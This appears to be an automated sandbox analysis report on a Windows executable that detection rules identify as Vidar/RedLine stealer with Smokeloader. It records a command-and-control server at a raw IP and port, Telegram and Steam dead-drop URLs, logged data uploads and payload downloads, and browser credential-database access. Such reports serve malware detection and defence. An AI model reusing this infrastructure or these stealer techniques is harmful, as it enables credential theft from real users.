                    Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
                    Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199508624021openopen_NULL%s
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/V
                    Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassbot
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassbotC
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassbotJ
                    Source: 06625899.exe, 00000000.00000003.404854797.00000000031BF000.00000004.00000020.00020000.00000000.sdmp, 22919964096183665961703616.0.dr, 50764714324176067669882221.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownDNS traffic detected: queries for: t.me
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00414330 StrCmpCA,GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                    Source: global trafficHTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                    Source: global trafficHTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
                    Source: global trafficHTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2
                    Source: 06625899.exe, 00000000.00000002.412477321.000000000082A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
                    Source: 06625899.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00428C70
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043C00E
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004051A0
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042B366
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042A379
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043C55F
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042A80E
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00426810
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00426838
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043BABD
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042ABAC
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00405C40
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00405C68
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043DC7F
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00407C20
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043CC3B
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00407C9E
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042CDD0
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00406E10
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00426EB0
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042AF7E
                    Source: C:\Users\user\Desktop\06625899.exeCode function: String function: 0042BD10 appears 116 times
                    Source: C:\Users\user\Desktop\06625899.exeCode function: String function: 004014E0 appears 540 times
                    Source: C:\Users\user\Desktop\06625899.exeCode function: String function: 00433750 appears 44 times
                    Source: 06625899.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 06625899.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\06625899.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\Desktop\06625899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/4@1/3
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: 36067264576515806059430256.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: 06625899.exe, 00000000.00000002.423705389.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.415215690.000000000DF12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041F040 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle,
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: The
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Greal
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: (Llangollen)
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: was
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: 19th-century
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Welsh-language
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: periodical
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: first
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: published
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: William
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Williams
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Llangollen
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: 1852
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Ebenezer
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: was
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Independent
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: chapel
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Inkerman
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Street
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Llanelli
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Carmarthenshire
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Wales
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Strigamia
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: crassipes
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: centipede
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: belonging
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: family
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Linotaeniidae
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: the
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: order
                    Source: C:\Users\user\Desktop\06625899.exeCommand line argument: Geophilomorpha
                    Source: C:\Users\user\Desktop\06625899.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\06625899.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 06625899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
                    Source: Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\06625899.exeUnpacked PE file: 0.2.06625899.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\06625899.exeUnpacked PE file: 0.2.06625899.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042C254 pushad ; retn 0042h
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00433795 push ecx; ret
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042ECB5 push ecx; ret
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.818078308305934

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 30303
                    Source: unknownNetwork traffic detected: HTTP traffic on port 30303 -> 49685
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Users\user\Desktop\06625899.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\Desktop\06625899.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004011A0 GetSystemInfo,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,
